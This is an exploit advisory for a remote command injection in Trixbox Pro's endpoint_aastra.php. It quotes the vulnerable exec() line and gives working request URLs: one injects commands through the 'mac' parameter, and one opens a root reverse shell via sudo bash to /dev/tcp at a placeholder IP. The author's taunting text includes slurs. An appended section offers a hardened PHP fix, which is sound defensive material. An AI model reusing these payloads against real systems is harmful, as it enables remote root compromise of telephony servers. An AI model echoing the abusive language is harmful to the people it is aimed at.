
Trixbox Pro Remote Command Execution

Posted Mar 14, 2014
Authored by i-Hmx

Trixbox Pro suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 16c4989fd587dda06942b413211a881e0f52e9cf1be3fd56030a2eb7f44eab75

# App : Trixbox all versions
# vendor : trixbox.com
# Author : i-Hmx
# mail : n0p1337@gmail.com
# Home : security arrays inc , sec4ever.com ,exploit4arab.net

Well well well , we decided to give schmoozecom a break and have a look @
fonality products
do you think they have better product than the (Award winning) trixbox!!!
I don't think so
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3 years old Sql injection flaw???
not big deal , and already been reported
not enough good exploitation , but reported
A file disclosure flaw???
save it for later
let's give Fonality little Remote root Exploit xD
and also give the "Predictors" some pain in the ass trying to exploit this
consider it as challenge ;)
Here we go
Vulnerable file :
/var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
Piece of shit , sorry i mean code

switch($_action) {
    case 'Edit':
        if ($_REQUEST['newmac']){ // create a new phone from device map
            $mac_address = $_REQUEST['newmac'];
        }
        if ($_REQUEST['mac']){
            $phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
            $mac_address=$phoneinfo['mac_address'];
        } // if there is a request ID we Edit otherwise add a new phone

        $freepbx_device_list = GetFreepbxDeviceList();
        $smarty->assign("mac_address", $mac_address);
        $smarty->assign("phone", $phoneinfo);
        $smarty->assign("freepbx_device_list", $freepbx_device_list);

        $smarty->assign("message", $message);
        $template = "endpoint_".$PhoneType."_edit.tpl";
        break;

    case 'Delete':
        exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
        getSQL("DELETE FROM ".$PhoneType." WHERE mac_address='".$_REQUEST['mac']."'",'endpoints');
        $smarty->assign("phones", ListPhones($PhoneType));
        $template = "endpoint_".$PhoneType."_list.tpl";
        break;

it's obvious we care about this line
>>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
Exploitation demo :
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo
id>xx;faris
result will be written to xx
but this is not the full movie yet ,
I'm here to give Fonality a nightmare , which takes the form of "root"
privzz
actually the server is configured by default to allow the web interface
pages to edit many files @ the root directory
so any noob can easily execute the "sudo fuck" without being prompted for a
password , and the result is > root
Demo
<Back connection with root privs>
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo
bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
change to your ip and the port you are listening to
and , Voila , you are root
now am sure you're happy as pig in shit xD
Still need more??
you will notice that you're unable to reach this file due to the http
firewall
but actually there is a simple and yet dirty trick that allows you to get past
it , and execute your command smooooothely as boat on the river ;)
And here come the challenge , let's see what the faggots can do with this ;)
need hint???
use your mind and fuck off :/

Big greets fly to the all sec4ever family
oh , and for voip lames , you can use our 0Days for sure
but once it become 720Days xD
Regards,
Faris <the Awsome>
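
Added example (not part of the original advisory and not Trixbox/Fonality code): a hardened form of the 'Delete' branch quoted above, which checks `mac` against a strict pattern and removes the file with `unlink()` instead of handing request data to a shell. It assumes a phone MAC is exactly 12 hex digits; `valid_mac` and `delete_phone_config` are hypothetical helper names.

```php
<?php
// Added example. Assumption: the "mac" request value is exactly
// 12 hex digits, so nothing else may reach the filesystem or the query.

/** Return the MAC unchanged if it is 12 hex digits, otherwise null. */
function valid_mac($raw)
{
    if (!is_string($raw)) {
        return null; // rejects array input such as mac[]=...
    }
    // \A and \z anchor the whole string, so a trailing newline fails too.
    return preg_match('/\A[0-9A-Fa-f]{12}\z/', $raw) === 1 ? $raw : null;
}

/**
 * Delete <sipdir>/<mac>.cfg without invoking a shell.
 * Returns true when the request was valid (file removed or already
 * absent) and false when the value was rejected.
 */
function delete_phone_config($sipdir, $rawMac)
{
    $mac = valid_mac($rawMac);
    if ($mac === null) {
        return false;
    }
    $path = rtrim($sipdir, '/') . '/' . $mac . '.cfg';
    if (is_file($path)) {
        return unlink($path); // filesystem call, no command line involved
    }
    return true;
}

// Constructed inputs: one well-formed MAC and the value from the
// advisory's demo request.
$dir = sys_get_temp_dir() . '/sip_demo_' . getmypid();
mkdir($dir);
touch($dir . '/00085D1A2B3C.cfg');

var_dump(delete_phone_config($dir, '00085D1A2B3C'));
var_dump(delete_phone_config($dir, 'fa;echo id>xx;faris'));

rmdir($dir);
```

This closes only the injection in the `exec()` call; the same validated value is what should reach the `DELETE` statement (preferably as a bound parameter), and the passwordless sudo the advisory describes for the web interface is a separate configuration problem.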